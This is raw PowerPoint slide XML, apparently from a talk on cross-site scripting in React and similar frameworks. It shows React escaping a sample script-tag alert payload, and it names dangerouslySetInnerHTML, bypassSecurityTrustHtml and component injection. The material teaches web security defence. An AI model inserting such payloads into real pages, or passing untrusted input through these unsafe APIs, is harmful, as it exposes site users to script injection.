    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42793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Cross-Site Scripting</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="758455" y="1414464"/>
            <a:ext cx="10972800" cy="541927"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>React automatically escapes HTML code in different contexts</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="6" name="Table 5"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4232528480"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2059222" y="1913861"/>
          <a:ext cx="8073556" cy="2407920"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="8073556">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="2136795">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1900" b="0" i="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="0000FF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>const</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1900" b="0" i="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1900" b="0" i="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>maliciousUserInput</a:t>
                      </a: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a:t>
                      </a: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&lt;</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1900" b="0" i="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>script</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1900" b="0" i="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="777777"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>&gt;</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1900" b="0" i="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>alert</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1900" b="0" i="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="777777"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1900" b="0" i="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="CF6745"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>0</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1900" b="0" i="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="777777"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>)&lt;/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1900" b="0" i="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>script</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1900" b="0" i="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="777777"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>&gt;</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1900" b="0" i="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>'</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1900" b="0" i="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="777777"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>;</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1900" dirty="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:br>
                        <a:rPr lang="en-US" sz="1900" dirty="0"/>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" sz="1900" b="0" i="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>render</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1900" b="0" i="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="777777"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>()</a:t>
                      </a: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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1900" b="0" i="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1900" dirty="0"/>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" sz="1900" b="0" i="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>  </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1900" b="0" i="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="0000FF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>return</a:t>
                      </a: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a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1900" dirty="0"/>
                      </a:b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&lt;</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1900" b="0" i="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>div</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1900" b="0" i="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="777777"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>&gt;{</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1900" b="0" i="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>maliciousUserInput</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1900" b="0" i="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="777777"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>}&lt;/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1900" b="0" i="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>div</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1900" b="0" i="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="777777"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>&gt;</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1900" b="0" i="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="777777"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>    //renders &lt;div&gt;&amp;</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1900" b="0" i="1" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="777777"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>lt;script&amp;alert</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1900" b="0" i="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="777777"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>(0)&amp;</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1900" b="0" i="1" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="777777"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>lt</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1900" b="0" i="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="777777"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>;/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1900" b="0" i="1" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="777777"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>script&amp;gt</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1900" b="0" i="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="777777"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>;&lt;/div&gt;</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1900" dirty="0"/>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" sz="1900" b="0" i="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>  </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1900" b="0" i="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="777777"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>)</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1900" dirty="0"/>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" sz="1900" b="0" i="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="777777"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>}</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:lnL>
                      <a:noFill/>
                    </a:lnL>
                    <a:lnR>
                      <a:noFill/>
                    </a:lnR>
                    <a:lnT>
                      <a:noFill/>
                    </a:lnT>
                    <a:lnB>
                      <a:noFill/>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7" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="758455" y="4364311"/>
            <a:ext cx="10972800" cy="182383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Does not modify </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>InnerHTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, but if you really have to…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>dangerouslySetInnerHTML</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Pass an object with an __html key</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="292608" lvl="1" indent="0">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096000" y="5464028"/>
            <a:ext cx="5648085" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>bypassSecurityTrustHtml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>”   &gt;   “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>dangerouslySetInnerHTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>trustAsHtml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>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7322" y="4789544"/>
            <a:ext cx="631954" cy="63195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2522" y="4674515"/>
            <a:ext cx="1219200" cy="862013"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="679260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 Injection vs Component Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1414464"/>
            <a:ext cx="10972800" cy="2073015"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>React does not have an expression language </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>No Expression Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>React has components</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Component Injection for dynamically created components</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="4" name="Table 3"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3941610040"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="609600" y="3690369"/>
          <a:ext cx="3983665" cy="1907824"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="3983665">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="556568719"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="1422430">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" i="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="777777"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>// JSX</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="2000" b="0" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="0000FF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>const</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t> element </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&lt;</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>h1 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" dirty="0" err="1">
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>className</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="777777"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>=</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>"</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>greeting"</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="777777"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>&gt;</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="2000" b="0" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>  Hello</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world</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="777777"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>!</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&lt;/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>h1</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="777777"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>&gt;</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="2000" b="0" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="777777"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>);</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="20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860626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47304327"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5185144" y="3690369"/>
          <a:ext cx="6319284" cy="1907824"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="6319284">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="556568719"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="1422430">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" i="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="777777"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>// </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" i="1" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="777777"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>Transpiled</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" i="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="777777"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t> to JavaScript </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="0000FF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>const</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
